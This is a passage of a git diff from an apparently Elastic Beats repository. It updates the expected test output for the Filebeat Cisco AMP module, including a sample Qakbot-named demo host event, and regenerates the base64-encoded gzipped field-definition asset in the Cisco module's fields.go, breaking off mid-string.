"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 61802, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index 4d465edfa975..1365580900aa 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go @@ -19,5 +19,5 @@ func init() { // AssetCisco returns asset data. // This is the base64 encoded gzipped contents of module/cisco. func AssetCisco() string { - return "eJzsvW1zGzmSIPx9fwWuI55ru0NNT7tf9qZvdy+0knpaN7Zba9nufS4mogJEgSRGKKAMoEixf/0FEqgXVqFIigJK8t74g8OWyERmAkjke36L7uj2Z0SYJvKfEDLMcPozuvD/zakmipWGSfEz+rd/QgihtzKvOEULqdAKi5wzsXQfR4KajVR3KKdrRijicqln/4TQglGe65//Cb5t/3yLBC6oX3OGi7L5DUJmW9Kf0VLJqvtTRTnFmv6M5tTgzs9zusAVNxks8TNaYK7pzq8H2Nd/OlSUWOmWiPO3Nw3m9Z+agi6AmgjDCqoNLspMYCE1JVLkeueTNVE5NrT3iz0I2j8fVrSFj5hAV6UkK9RZqMUyiBxdU2Eyu3zG8iBSd3S7kar/uwN4nSNdzdH1JZILZFbULXOGclpSkVtWSuF+BoscwDGnhhK7Ujz8LN8s8Bq/AvMNVtQvRfNjMYrKNItUy7JmjQO4ECkEJUaqbFnFxuYvH1t8mnWQ9nvIxEKqAlsAyMC9OIAqXFpAM3z+TztqAmGl8NbiCQsA1rdWImBDc4tZJPTXFRdU4TnjzDAaJmHBsTFU0EcQUSPeW64mpMCcESYr7S7QAZw1wWLWWTwe3y/bX1uscX2hO3zHsDyaU8duZpj9zRnIVHqPi5JTIEmXlLAFIyhnCvZoC9gfQxrhFIeJmksZ+N0Bov7dfQmtMa8oYgtPgqA5WjBO0QZrBEsiqZCQR3HfA8gsgPCh4VIsH4bnhayEsWwHoA2OTCDcMvEhyJVKEqp1fAQbwA2SuweEiSWn7pwcfZ4bpLFZRUc4Z4sFVfYk14xkUZFv7m/WSPjoNLQywp0PqVAuSVVQYXTzxj2OFiKLsjJUzSZ/f86QZgXjWIFElCXidE157x08Q/PKoEqwz+4eFxU3zMqb5mMa2QefibXk64MPfkMtvTdUCcwzVgZJHfz4CCprmOj6pia23pqV1EdvBCaGrfv64yNk4bXne6XgNlCRl5IJg5hGbqnjZGCDn1f+M5znalzUnPqAct5YF0wYqhaY0J0n3r7yD+OsvTuznOlSahb37bzAhi6lYn/g+vm0a+0+jF+9rS/xV5bRX13YHfzqAMo1jy3hU6GOG8YHFIAUdIlFMXOyObpNUB/2BjyaY01ze3i0rBShCIvcAjJMOAZcH9IaPTtmBSZplF7MecPzt+cXqLlfRyJGRoTGkyFGuKzyjEkyieLaFQrXv13AWW0UUvsDONUaLZQsjjASWuT1SiqTJSHh1oLufigBITtXrsT2WkwnUWr84wkNTwHLqTDMbGdF/mM8Et5e/ohWWK8C2/AYHPUKfxfx0Px6/l10LBeA5esff4qK5+sffzoRU3izsSIrtvYm13SHFixEv3aSVzBA3DTnuV7TkdjzrDzMIbGPhsTnfQoqprkP0SkxBpM7a5BixvUMlyVnBMdXrzqAnfu1g/rVfcklM+hGAdqs9hAf0haCBMB/aZ4V4MSPR8QNNquaz/SeksrgOQdDKOccmRU24CKq1/faore359sAkSdQZ1XS2oqKuz8WMipoIdW21tb6p4t6Co70lIfw15UuvQtk3Cf2aO2zxtt5QDYrKhAWfmesDfv4bZlWKSoxmCYRnhGqlFSTOYVrtwGsepRIcvjB3xmRecTrC94WwMPC9Z+eM7Hc0TKOx9SsFMUmW1XCMLGcabqmipltRNnvISJFdcVNLf/dusiuixRdMm2oGn8A0AU44dEbufn2QjHDCOYPI4wJAs9bpmhpjZq0nr5G4rRU2i1ya5+IuP3BRGgzsabasKWPLClM7iD+oXV1KKQxhj3E3CNibsHVaNeL9AV9j/vg8rNK2mkU6KoosIp5MxzAmgpZGSILWnv54iKvaEFzFlkfek+JLAoqcoAL4T1FteRrFxPrRv+2CEQ+vFHHuS7HKIl9/lk+PP3+ONlnKv5WUJFnhhXhy/Dw/InfrVrQl6gLJjBnf9Dcsp1wqQ9qOaOn3mBlkuNrNc4munqCPsZEbpVyqaJ65C+bOFoDHwBqpyYX2JAV/GeoU+7qOG1A7u31h/dXyNgjRA6ZBb0t8V+KSeAbpk3t5tzBrC9JO1eiEg88SoaSFQSxUqPerPM47L8YNj9bvvZy33Q3my2c+7YHqV8gLw2uk09euz1HvzBFN5jz/QlsNR4F1RovB+lh4w/HXh7ZR6PFxMNG3nfCqApuWxM/rxYLdn8kGl58/Iw01br/cu/F8Tf4OeZ+PYQXhir0/1mEj0UUYkVZE4iMwblbF39qg5v1A7vgcoP2Gixt2loTt4qL22UnIPYYBFXFaWb/GQOpd538vnNCqNboQgqjJHf31C7WfYuswcH2Oc16u1tpqlLgauE6vJh7Hn3k0bHzKAy7Gz0Zmt2o6ANwLXBZ0jyrr0wZwLP3w4MCxigstBO2nnfXN7U/6wG4WD37aK7tTTM+CedRNT+MrTWOA9gOsohOwGTU7u5hsiNfIm/kbsz9IbvZxeqptrSL/bH72sU7xeZ2cTq4w14thVSrOHoA2C8udctKizoD+xWaSyOosZguFozM0G8CZM6aqu23XG7OkP2rB66QOVXY0DO0YsuVfWzg4/Y/x5BFnLd1G4My77ndNs/fOGW/tFbOz2jNVKXP/Gf69Bkl/47FGaKG7KXHZ7cFMtNPpOajz6Br9B4gC8ObvhcTRooS6goCWEBmxPE4XF+8vRmvE9hZcOAuPn1BC+pYXo/QmUasfLp511kb7awd0gVwmSlKpOol3R9E5BEaPtaaLQXN0eX5DeovHmRlUWCRZ5wJmmG1dJmqk6Hrl0d2edQsj7hcLl18yF5jLgnmCFc5M/Y3+8ipye8/gkfS8NBXsn0OW8ZD2gGcFM6skakr0IAXFefb5vSIvVSUiq0Zp0s6k/yBZ/jEvQDvFgbNUrfLW/2SrLBY1hq61zclz12e/nFECLp5hkQIujlMxLxS2szk/O+U9KVYuktRuyvcsiD2AQ+0wUowsdx7oR3GbJpj08XWKgHo+vIkdH3yZ6b6btmkssdnnDpkAX1NqTgCWykWbFkpmj8Nwu36HdwPo43Xy6fBF6+pwkv6KEY/GfIdZgfowJzLTcdXueeEFxXHhq1pRmQlphMmRhrMEanrUzq4r5jRSDNBXNjLSxuos7KqeR2EoVh1CNz1kS5MF5vH+0h/YYqWckNVbaVc0gUVmj4Tx+kvHy6/LMepRfgfjtN/OE7/4Tj9oh2n6KOm6Ori1v9qJrCZsfIf/tQT/akhdj5jR2uDbuf3DzgC/3DCHsZp91j0+fwPF+0/XLT/cNHuLHjQRaspqQYJuW69oDelXbC33Hu88Zo+MPfWw0VX4xUK/0XcxClR3Osm3rXxmNRRbbzr326PaOLUOHRBC844e8DDdaQ2aJ9Yp2Nb6HtP0gITyAZ9qB13e3XxsH2pF0JGos2KkZUTkt7mVHRBlUYvOjl6Z+j23dubM3T7/9+eQc2Llj2wC6nM6uUMnbfAXWsYhNEKq9x3X1ozQs8QRqWSRhLJzxCIMlfGg+SiL3Otkr/VhhZIy4WxQGbo2qCcCmnojhHgJT3BlW54777af6ccmcOELF8EOWvstFnPOpBrqjaKGftoqYoOzutwk07vTtY9QsO+B5sVVc6f4h8ytMIazSkVSM41VTsNLxobcifV7BAxw8u3l5TxuwVYC7yrsoyvPrb+/h5she63Utm3wgPSoj9YW+2Obq0tV2kXeCG4NJXnv8Kb5uKAzUdkQbUlGrIAe6AReiOX6JLah02FCXGwBnncp5Kz2wfOkhYZsEc4Mfc9y3XdKcZAAE8uEBPaYGFqNHQQx0CC9jEIHkrf/tCJ89glEDZenOLat+bcnxi9o+Z3ZoR9BvzuzwZHoyFWr2TFcyTomiorQetzV2KlKXpLDbaoYVfo3y714o1c6lc3mNxRo18OwF9Cywu+PWviUxi9p05YuBMuOmjOgowc2h7HcfJQq6NLWipKwGCymOR0wQR05eCAlivCLHAZxqrQy2HhQ8wT6Pf4rb/n15ff+QZizstTK+Z1sjsmEEF2+6UGGwHUQTmhPy3wObsdJVaGkYpjBd/3GzsbPRkD0CedlNDJGEAePymjW7Kedk9e/2NP9u+JXTXNhjzu+sr53zMgpL8tzwa7NT5F6CVHTVGn+z5H3CzbUt3/x2GmDTa0oL3g6DNBDtKPMsLxoPL/WaBHhRnUeD4LxFaBOvJngRgTpyGWVmOqJcfzPWk5xadIj7RsW1AXMYhlQ43oNSE7M9ALzGIz0EMGSsLjrIieHjKAfsCKGOfiIPA6CRdFx6sSZJ9j14DMSOxDAQ4+mH1kCrW6GsQcavrrNki7Ru2FFMQ+DtjI527ZjoibNUsrDrvcvbDLsEXdKckfyDdy6eINdUZLJXKqwFlKvaAakL5g9zRHmkLW1c6Xd9fQ4wZLvQkD2I82WJpNGIB+0KYMPYHx/UunHcwBXQ/gycN4MAipJzmXv0ptuiKS909k3Vrf/1KHjk3Hh/Tl8HfQ1vkY7u7vBd1l7PXN+ocmh3/suveZO6DeyC+Vuet+u7zo7P3p/132DqLOSWRDXy44R1rXW5YjjJZsTUXjJPtyFQETHJjz9BZI/hyVvy8jojHq0JDlNlP0c4K97gYPYYOBbl9vduWWRjdwkc68N9tg9GFbUkQG3fzBCqHMrKhCH6+F+e4nJBX6hUtsvn/dtjH3ATKoJhh2tBrSfYq6+wXTDWHQdMZnBP9CMBFuEuu4XvmLdzBItcFqUJ0ZTevoSLQO2V1OXt982tH3MNSv9bcU1bkt7hH1aEO6Pd1p5g6FM4otGdReuO/saisH+JBK/9qTGHF98+mnAAvCOTkoAgsajIZcjvH6tAd1qDie+vqsKM6pmiR2/Sssha4vHxMldfh2g6UA5rRY6bN2snGSJfez4VrRum4VLbgo1nS5kJzDGKMvUQBb7j1Bzo09c0wj4lhXj0vrKKpvZF9tQXsY/QwtvoLMn4uqWkgNyW6FFGi+HWwaQop+rqiGIijNipJv/T7ZD7v+j5iskGY5RS/+hMxKVej1jz++hNJQTX0bzKLv99rlxLNQXo/ghC6l0DQdK8gXcypciXDtU6iKuRN6MOM2CAG9wHO5ph1mMBHMrKzFmzaK4mL0/pAv5tg8Matozqq+nhaDUV+FNMfGscAWiJm/Va//9N2ftRPpr0oQoDXSfxtQ8zdrD77BW6rQa3QlCC41FMFLASblg+R6CPojgx+B3MrQKt+/Rv9qyT1D33+P/hURqaDlBWyTW/QM/Xdu/qf9INNolylfBbdQyDxQNPxMbF2xoRnBnM8xuUurATvk6oIBbPwYO6bb2QW+u0gQUTgcGcwMSK0PwjQvzAFjwFQbqaxmLbZO67C/WGPOXE9xFEIKuX6z9oXhtJlsjo9LXty9EQPIMWKB/jrsCRuN7MKWS5w/l3fOo4M0+4Oigho1bIqMYP5o/8NgC7vnvhbC9tnHptVo3SwQu20z9Kvc2K0Z2pxMIKmsMWYkuqO0PMC0Z/HifSFMcwONszXLszxV1PWqljxLKqBqVkNZVeXsaG8XrpkyFebWaN/xvYuAi8NPzHUD0tuxzP6qX18iZaW1BocKMA2rJTXNxw5yQqtESU9Pzom6Zn8fJ1SSUNBQ8LfDRt7TQhqKbv15r3vlzLdjghJBtxEXiPkCAi9+pUyXnKXMbHjW5rxmA7X/WehmVuYmPO9w6+wbUJdp+lNXWy3+CfmvEWF04mXBBvN9JojRw/RAqdDNxfmN1319US4rSqn6Gi+CJ/KLS4Oonof7w7dpAEN82HwNOVfqrilftV9pDXan54BlPkOvf/wJbYDvBcUC5k4EfQXg1Ac1qfUfoQ1VrgcegjYfWBskRa9cZJeJT64mftlMDNzVFGFbz7vfpcqBcZDVRMlKSC6X234gbsHUQItF6EdEVlhhYhwT7aXeAv7gNBeoEj6nh+/4zEcramMXdLtAfcogwp7YJVgUhRsUWYcRFN6MyjSQrD21EhPQWF2Mwo86RZIQ6PEIELXBIscqR0Kqwg2kCtjyqgjyJ/dZDiezSFbzwZP0ICa1WDfIvOJsQYHigIGvKZEiH1Gw2+3OtEnpZ9lDEBNEFiWnJngARp2oGBR4o1hPDHbqzZR5ooN8a9cOHuexo7x7MkePXyGFWUXaprY+NVbOS5vllD8R469EnoLtFuQfUqTutrBHLNrVaxXTpdd+6HN4IKKS3ehzZOi98ZcPranSnXKKfF8eWGB/H3vYthTHIrMt0yNS5TQ4ETHOKfZJNv6Z0s2KtY5RZ9o0H+zG14evlZLFDKBWUJSvCRVYMenU+qLihn1rGFU7c8LbXjYFFngZKs1FiEN4Z6etT91QCjHztUZyI1xkzOCi7HsGPcbQf1PJYfIRMxqRFbPWjcypnqG3lTZgJnWB2luJzUheLjb0xE3aK8AWC4v3mk6hCcEm1ws63kErKCqIOxBYwKjHNcutZgPnISzIbmtB9qHHvDCR9yVTk1HY7qeLBd3bk8gM39Z9r4wEfc0i5Zoz7vWNRtz0URfOmZXGjTybDZZs0slkFVsCFQNF7rEQG/7HviqgQX6uaDXZUbKn252iVj5usEaARD5ybgC572IzNaJSsMPQBDJtWZgEr++ySIFrmSVAtcxSaM9lTFG0C/R1dKgJdKXOK/I0JmTPfAy+MYPn8kFvzqli85BcOyVY0D4QvW4IsR1BmAyU+BiKta546rDTiBXlJ9m/cjg0xgtkZQ8aYCJ7LhwLdgzIkQNC13TQDncywurVfRFgJ7Kzz+WTtnhx0DvQvdJNpYuFBnGnkhK2YK3hE9ZufSv3kTPldeX02UyBDWhcjCxvCyZqF1XugyxBvL3ZPNUmfNq10ruWoFTot1ufGst0nRDQ96sh3xe2N0AB7VRJ6lJqFlFwHHW2wJwWueswBan89d0d7cJTcTNsmP1UokhUBVWMPFQWBWmboIptD2HdSrbmZjix5O73gLQ1FblUPmF2L2Vy/vcn6F5Th3YDbc27iKWvBR+w20rQ/Yg5SZ+yV91Xwwvpq/69mPFerhVucouFNAjDmAiLZDiBlstlVieqPIlQrw/ig4X6FD1TdmTfXyDdCrpW74477GJVSs7INvXt2SMXbgAB31xb8O2IXA4OW0rMwPcVp4BYWJxKYeh9ao21QehaOH9d2w8V57m2f8GjCqPeAKFQA5gDj7Obkpn1x3UmkAVjgct6JGfTKwQbo9i8MrQjIYY5+n7Ap9XWu89fWHTosj9B7PFWixv1Ov3NAUOwn1/k58529LeAcQsVYJZhdcNB3eZ8qTVVM3RL3aZUmqoZXlJo5e0z3RdS1TgMYNdgnN5O3NAt9/1O3wqp0FzJjf1d/VOvazqza7Sf9HV+g5WJ7aZrAMf2qPg71Z/jO92damb1JrxSsqQ+oJjqLT4XCHOqTJNdpNpF/c9ceMuLj04TAEhCCijMORJSfKtoScGS2Zf9AGbDlE9OPXy0sVdMM6DzFXMRtjr8M6Bsw8zKK8tO1qNLWHAO1SYCSfHtUtp/73kJQEnJAopjQrpxJxj4ChCwSMoFstLBMKpn6LaVKf3BBt3KqjQYX7hyvkpbI8aVjLpkm9yLX894jAivtKkPpP/PYJvgK0zbnfQ10d6/YRVf+O24CjS59uNuWNiid22Z0illXx8yvCyWl4AFwlpLwsBfancjaE/Chr1hd/RnhFG52mpGMEc503dnqFQwEwVGiX0dVpSxwqfUXj7woXd1NgoX1MAwc6yhi5eGRg6uF0E9Ol/uBO2HpTU7U9HQ8Gly78FTaXydPUzwMDnxTWRRVsM7mGDbMNowkcuNz6clUhBamrMmk2KUGQMyFxXnW/S5wtw5P3NZYCa81BCdhbgcebq6Xs9Y6tIe0q1K+IaJO5r7WqA6ER1r8E55A8X+5qsGtRnL920cH3SFSCrqupOdnFuij0CN3m+3T4XXb6X3vKLbYbueJuhMVcH6g51Su1j9moCtO//7Ne3vI2vaC8bT3/GG5F9gteYaK5pXhKI6ckTD7jZNFcM8C7ymyR6RW1iyVpv772PnAbQvzKhfgJI7fVLLgRgeY7+6fehWWK+aG2rVwkCVYUVWLvO3rrFpygwvaki9FmGWkGaZmVYEBt/X/x9WmiIrzwVikHNXCRiRb38EjfBa1HwBYTsEzxV2Ho4+OOFXDfs8PesXi8hiXs/TlYudB8uXjaoHvF4w8HVqT19XGwEExj1+0wRIA1fiwq3uejKOe0qdBZfcNd6wz3mZry/ROydpXvjGDchN2/NFvxa3l2G92jmgn8KX33E/X18CS33JWyMmht6D3YicSwN0JMzcIbKyYMN02Ehd623KXva7UV1foO3Uhb1+7JHhyIkv3UU7Kff68qAmG8s/d0CTtYi9Fnmr0c7QhavP9P1OufvFfm0WEFS7n/juK++Om1emqdyUpnmMKsGpdpyR7kHZSLTGiuE5H1QBuqYMTKCS4xFBoKnQSfuj7GxoV1V1K8+spLIaRl1fyOw+3766vunr0Mi3jHUehbG67BMHCh5dC9lGWhyS6FoYdMuWAoOwGDmipVQpm9d+PZBf9pDe1LqbhK6O8E+LSHf4tD1luQwcnHe/fUBMEF7l1IozP8jWDcJ/cVUPML5xDhEHFqT3LOwXgcjc5LFNcE61T0sYM6bvrMp9Al4PKMXruDHf+afhPdN3e0KuRrHlkqp0I+zCLPvUjQV4HNyIZkX1SvLcnh5nq49MGt0JvU/gWRjG3r1UfvHe6Rgvm2Yc15fhMpKjo/NEFmU2cd4V7IrPvYIxrs6/p6v5txYdKaA+deFmc+cVGbPSvFr6RFljXcwbaSkVdB6wcr3Gb2RKnB9E/iQK4LCr/gJmn7uHyBIx0hr5hRWiGL3FpO6nHFZurQia1I6R4ttaQVX7pZCzNaMPtVYU6+i5wdpgU8VSnBt/FGb8ycwOu/hc3iOWvxp/v+zLWk2BocXo46DxsbsLFovw1a3fscTT9waH/HI4d++U54wJWcWKcXbqSPQy+p2ykjSm02Hgkf0hMuDUnRl3jsQ551buIV0RQrVeVBxd2fURkTnV9kjUzX7DlgUTOb2PzADOtDlN83ykbIGFwRRTNRJzqiC+WWDFOGTwBDx4Lv4ulggDE7+13w1SJhKcQzl3zYWeSCP2q6MXTT5nSZUufdGtkzADlnkVoU2Irzs8vRwpMnRuruF7nDqhxClfTZKX91W5T9tfYiY0yqnBjAecDHNZmc73RkiTfPLczNpji5s8NsBj/CE1tCh5smyec5TTBfYhIN/5so7h+2xNqxWvqeJ4C4VcRvrHFb0I3Ej7C7C6/bfpoq4Cd756bZipoDEjChLW2gbDhk2Pva5Ro1gd/w7BsTFNIKuILAp7n9IcowsHHbFOsm+p5Jrlzn9Wd5ErqB5NhMolOT3Q+HBv2S+Mt1oj6eblhVWD+xKSnp5G1terp5X1f5fzE/1OJ5P3v+XcB2DCt6tk6RrnXkJCsdv525trdD1QqLpoJOta66tL9mMQsbCrqYZdRjWkH+IP87nVYeXeiYhsLvPUFV+Diru+0uFxQRaXEfVoFb9bggsZTFB53nEB+9Jhl0DbxEPYkuVNKGfEiVfEthoHZeARXv54Sl5Dd1mlfKbq6d43H133nDoQBcka95RUXS+CS/2a01B5a92FaV/ixgSOkKBXPN91iDTVlXiNGcfDQAZqXOEI6isXVKmRSQvuDp3i648Xd/PGSuEbQLkA7IAkn26g2XI2IhFZkc2rPN9G98+wIotaB9SBW2l6WqPzvV6q+BAVkxG7HPRK7DJdTVGQwHQ3e9X1XMVVzkxTWdf2RfMYhQbbtRUbTpS04YX9RLossdgcXE9mlV98ukIvfK3Ep4pbXXnOOBRwQB7Y1X0ptf3kS/Tt0NEg+lGYOyE3YscQ0pRU0MxivQt9ZNImwRO44PppoRd1lfs7X5r0hi4x2aKPo+YaZ3OFn6Io3y+8w2ImUIGZWChc0L3pGCVWMLU3fZ+EHeXyBpZF72TukqPbtoCdrLMAUuiA9gWpApYRqSyk3b5x7+gG/VoJMCXfypxy9IKJ9eybM8QkOUNz+xe1f2GB+VYzPfsmHF80pMwWHA8m58fWoXY1/IsbBIuCrwvk5LYefiUXexs1GJkUU/fTucezboOgqbIHOYjQuogrd3uYfXr7O1YUfXAJwN988+nt7+fvr775xuXcrrHCbPRMbqS6i1myfPCC/V4v2I2wjTrBsIitRPianbhdSprnABP7XGwTmDALqajQjMQUIB1XUgKMi/hekEB8IBbQbIPZcDjxo70D0Ps8NlB7fWKXqOtqnuhSmHmujYpd+Q712skcYt23NNo7Wtd8pHOSnlrs0g4GG6g0vtikrXvx9S4WxIKNOppqUpM5Yk8lNdiNKEBmv7wnLJRP7if4cMeFRd7r/++Hq7Yqs5v89yRHLO/46D0ie5F8ksNRx3H34SflBElbOzvbsUtfmCajvc6ygz6ZL8HtNji5hyPTdctqNkU8DIq+Fphxy+u6mcuNlxnXl93aNujEZc1BQ5eBFgbjWYV1znVmVcQT6Dkl8RrSrX310YUsikr0PVED7MRpjZsei907em/+QsM6dYObPk2zfixut1jk/y7DUbMWN4MNO0UyPBq74cI7yOlKl4wwGS1LdCoLHrDfYCWGQYfnjroWRZnJVML49t3bG/Sb86O2SalhRD5Pmkpw+x9v0OeKqpHerRUXmaL9Tp1pkxs6DtEtel8XnQXTuhotnUR8SLtAZewxAhZoeZLj6BBUEwiOPRpuHn9AA+ZYFQl2y4JN4F7AZcQC5AZolUebSrsDM263qx3QOTZ9rfCxcOdUkFWBVayykgbutsSD8cWPjj5hMkinigIzW0U/C4Qu4hZQNYAXS2i1lACsnP89AdQSR5+E4TpORT9eEHTPWOwHx3duK6hVPaMjLTJMYDBK/PITC1uLiMZ7B/B8Wa5/EPdmFf19JyIjRmW5jtp3vQPdQj4t8nQE4DXH0SWGyKhYMhGxKHIIOkVutMgWmd4wQ6LLD5EtuNxoXMTPXenCFmadDnqCqAsRGRMpxQkTJVXFfBst4X0AuyR3aYCvMU9xVliZlUoamcUPSQH09Q8ZeBzjw+bJ7iaXyyxPwWwLOH7+GxFZge8zY2K5DXYB2xPNaYJHoWAiEdJMpEO65Drjc57FDovuwP5TQuDRO4N3YMfuhdiFHbuqtwv7x4Swf0oI+58Twv4fCWH/OQ1sI0uO5zSFSGmgxzfPRFZUHJTv+TbBO1kDL+8S6CVFxdmyKNNo31bLxHwZOwnJQ2YplBJNP5P4vhGRaZeQmGAHtSJprEkLOI01qbe6KhPMIiWiKatOYqoaaazpQe8TiBAjjTXMUsEGsyYJ8Eqwe4GF1JQkOITrnyxXEj0K659kaVYU5wncarIoM8IT+LAt4ARBEoCr5lsT3y1qIeskkMsqSxDTIIoZRjBPUECkM7ykgmwjZl11YQvMt3/QfJ4C73UGbUCTQHbtYNJg7RJrk0CfL8v1T2l80DqbM/PnJI3GiM7izorrAVYyuqjWSa45QKVExa9y087HH23WVgcwNSvn54/vHHHAQe1LAtx1k4/XQa4De8E4TWHD6GyRYhPZImZx9i7gFLqBzlgJSYpZElHHyvUPuTbloJl/JNhakSSwOVvQFGaMBkdzQXMWrWB0FzYTaU5JIfOKU01kCm574GyZQDbJUm+wiTrzvwM9lEEeBbCiS6aNwvE9IS3sBBqfomUqVqtkvNbQiVwlkq8uM98d8QTQjaK4SKBIulKgVGinU643K8l05ibMxoe+xQonOeD5SCFsDMhrN98+NlymDRbR5xzn2swrFWtYYA2VullBKaBW0XGNr0fXNcmxwcLkhkX8YdendhrYB3OJ8zz2HWB57LBq3ToowVvEiowoKYskXYks4ARmGiuyNMmRvuNRCjaXd9HbM5U6fstSVupSschAOTbMVNGzzzgTNF6LnRaqjjpRp4ELxbfx3Vpcuq6n2YLL6M95AzxByr+1eaNLHQs0gcSxNnQCVKPnJnC5THJ0xTLJBS6lii3Ainm1THHNCqZJCrFQ6CQHNsUcCEENNFeKDje6DHcNoGNn/DmosdPxxGYT2wJJUlEm3QDo6JaojK8ZScWWWWAe16PhbgRV8d+sMnNDeaODjTqZugXrRrwmOWQJCjf9TJzYwsCDjS0Nysw5kqKji7W2v8zIKlad/wA0vS9Z9EBASVWxVFiYQc/dGJA3SQDHf3pdJ7KPH3tTQCMAVnKZYV1GHBjQBa1wbKiKYp5Cv1OUAB9c19FEwOMz2UKO28K1A1mqPAHG8R2ZOoFvWDvfcIJ8AE1jJwK4gccJjBNNP8c/AKEGrdGgJjClNFsmELy6jO1l04qkuAeK5NEVaa1IqCtuBMAm3oitLsxKR++quSYidqFEcFrsY4G6Jp2xyTdLE/9YOaDxI3rNTM/YcLdl9G6tVT5PkodeKZ7gLaw0VVnOYle9JxlbUUeGUrDBEG1wEdsbvM6Y0AYvEmgGa6ZMCjV8XYoErZuMVJWI6WYNtUULdBQ9r4xE7yuBBks32SMJh+V9wpzl6ELRnBl0gVXuuxlqaP8eRsdNzkrIpbEJoQAGhugj6G9AJEehUp0mH4KJdJy7Kkout3QwWPAg/xayitbU+8gzZnnofEYw70zRJb1HBe43WmhjsWJZ9YeBJEeSMw3DGerV/dZDAyWkq7KUyqBh41GENitsEDOoVHQxdhQekZb7kCEUIcZ7q6NBATHhO7uP9IXmTKSeyN9B1a7WxVMjI5fUrKiatZ/XK1kNXjSEBF1T1YwjMhKVWGmK3lKDYSK4u6u4YcGLN3KpX924steX6NKP+DpDZhWYUgTNgN9TP/oY0BboHTW/MyOoDu/z8FAnYd4CRnY3twgWd8RqihVZzZhgQfxg5u4E/bV74hNmYUAyxCuOKwGzfpcVzHGtm7iHG7j3+rXvoSl9O+6GpqYJt59fPGLs243IItY0Hdd5FZZFH+i9gVsx5i6YYhr1iEBqB9e9gwnVgo9MvITuuQnHgUP/XE0NUvRzRbXZ07T79Gzlh/fKdyoDjOVxqzqJ3fdINXmnu+6UfTg5jCA2tvNz6NCufw5SHnP2/+H5hnax68taKMDa4bMBVkO8JN4HHmH7uMyxpsilazfYoMGtanbJf+Np8BXNKPgGc6lc+/ogGxHCGmlKYdwZ3j+vSmGhMZlgvO+gw7RbWoDa2x4aUimYgLYP6ZKqgjl1Yyqk2yXdYA62ZpwuKeJ0TTnCWrOlcBvXzusPH31oyfyE8hvW33PS508y6dliVgn2uaL9MYk4fPk6+J7WMfG0KSi1RsNydyGJFIJCbgXaMLMaExQIBSpDGo1d0ZPKix5sWlh2gjxpnigul4xgjiwGI6YPYPG02MFSI2Man4535Wqrw+h10tk2spfVGvuBx5xhna1kcpvAGXGNuQazVNqhRlYqdkfwhPsBIHdpLLbwpvlBLIRTrGbnXEtriO/ct0sIlqNf/Tdm6Fxsm/8NoBuw5bUwCOczIouyMlSFxXASN74lLJ159lV/L2DG4s6GMPO36vWfvvuztX0vO9tRc+yrINr+nGZxI2bHOm7wlir0z41PTr/yaABy4Vsfu/4n/ZkXLc47p37vfpyYvHxItn3dH5hi15mhd799uLK0U0Wd8wT8pTnTRNESC7K1WqVXz3g/FwQBh87Qh7c/o2thvn99hq7fXV7958/o47UwP/2AXmxWWyQoMyuqEFlJ7UelSaUoMfCp7376X//t5ddBjlCzSijj+vwAmTorcHgcj058+h54zW/dWbyukQpf8fx5Id2VTQcwP7Fh3NEPfAjfnmLaWiefmDIV5ujN+bsgsn9IQdP5sk47Gf9HCjoL89ai+8WIUCDksPCELXiOb/CefVhiQzf4CUakw+m+Qed5rsBP6055CJ3m6SVFeWqc87GxkOuLtzfuVRoNjxVYTxj92HEqOU3Vv93o+saiMuL9sjw8cRJEFB7atcd5WGtimZuuNa2A6KCL85zZD2PeBmw7s/zD79yEB8CahHDBpb/hl7tHYIBKm2udRK879knD6J3H8EYq04jkgdDNIcAGG8DM9rDk1RPz3tHDxLJ+TGqy3o4xXtCQ3TiVF9djB5Yv1loSZlVO5zca6DjIymWFxZLOGtOJSLFgy0rRHM23AJOKHLKGwnKmPLH1wKBodERbDi66SNDvgEfU/bslXNEdAIoW0tDMZ3bHzzOKz9pc6AxnLhU/AejSqDTAFwmOxCJBtTBPcR1S9T8pEzAV51ntiUunlvcteEvHrL9a15nwBBrslVlRJahBH7YlPUMf62fsDTjAvkc3tQNs8BL8Nqap1aN6JlAmRkzjGmnvFz9DmPOgMlG2H4QEN6wgMW9NlX0DmTASaQOPORPo4/WoQCGQIJtMXkUX2RaoLBOMfbOAFdWxM3ot2AQlLu5FjJ2KDv72BNi60QoZp2IZfVIk4GyVj4Ra6IgG6lQezDsBGIEIpBMsEEa/SLXBKh/O6UbofAnJXgphe+PvIZduTs2GUhFWPSN3TXxojFsazLuhOocMgpbxkBkxoJAJn+cKaQkFM1Ys+REbYRLXHIsp4vhHOCjrBJGOi3JA4K7Lso2krK0FuwQDdvfliR2ppAS6EKzj9YM7LmKPlWGk4lgh6BeNaiReXN3//EYu5WIRnv5OSWZWNPn27iD7wS7obmMH7yuLt0X3vDIrKoxPFh9FW1cxOyccl9DjlhxH/aOmahRhWRkip+W0X3Ic4duKEKr1CM7Qefy05minJZ4AXsiquEuptihQmDDAbQrhtIMj7eFopRIE+HQphX1XrNwKKYfNF9FAUdqlah2vH93Iu4mR61oKNQOc0byhx/thevowE0gzUwXkJ4LiAupFtIe6whrhXJb2dTEryhSSG9FumWOcwfdSyGIkrxZmcmjmWtRPq0RY5Z6J3MofqXTDAIx+YZyic4/YbMCGY5y9oiHM3cnRhPGG/idJVxhlwa3PWojLhRCNAUbErHd/BCNcvt6tr9eIzYnxhNC5TFk9ECB+Tld4zWQF2iWRRalkwUYyFOnUyF0JPOdQRLZAF/txY2LdiJ2ESPYx3NE6URCBHQyjDpc5AcHA+g1+qXe388q292302LVllpUw/XK22Bp9DmXgGTnFrD9KC4L3eEkFVYzUJAFDINGvn1rAzAqe2tBsN+SRnZHvZtqo8eBnTdMpbbeejKbX+2ny6oVbKyFdQdO0McINK6i2ct1pe4qWdDSI5HchWlOIgxsBjQcfuQ3qyKN1Su/uJzta3x9H03eZjjbk9GjSvMP4EIUD2oDiViAcIQy+XOpeH6ROTbp37qJFoU0d3rlovVSnESAH5HgjQL7c4/j94S2LNdpgmi07Tj6qSSVIzD